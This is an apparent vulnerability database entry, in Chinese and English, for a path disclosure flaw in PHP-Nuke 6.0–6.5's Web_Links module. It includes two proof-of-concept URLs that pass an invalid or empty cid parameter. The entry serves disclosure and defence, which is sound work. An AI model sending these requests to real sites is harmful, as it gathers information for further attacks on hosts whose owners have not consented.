https://www.exploit-db.com/exploits/22598
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200312-377

PHP-Nuke6.0版本到6.5终极版本的Web_Links模块存在漏洞。远程攻击者可以借助无效非数字或空的cid参数来获得完整的web服务器路径，该漏洞在出错消息中泄露了路径名。

source: http://www.securityfocus.com/bid/7589/info

The Web_Links module for PHP-Nuke has been reported prone to a vulnerability which, when exploited, may disclose sensitive path information to a remote attacker.

An attacker may use the information gathered in this manner to mount further attacks against the host.

It should be noted that although PHP-Nuke version 6.x has been reported vulnerable, other versions might also be affected. 

http://www.example.com/modules.php?op=modload&name=Web_Links&file=index&l_op=viewlink&cid=[any_words]
http://www.example.com/modules.php?op=modload&name=Web_Links&file=index&l_op=viewlink

来源:XF
名称:phpnuke-weblinks-path-disclosure(12436)
链接:http://xforce.iss.net/xforce/xfdb/12436
来源:BID
名称:7589
链接:http://www.securityfocus.com/bid/7589
来源:BUGTRAQ
名称:20030512Re:LotofSQLinjectiononPHP-Nuke6.5(secureweblog!)
链接:http://www.securityfocus.com/archive/1/321313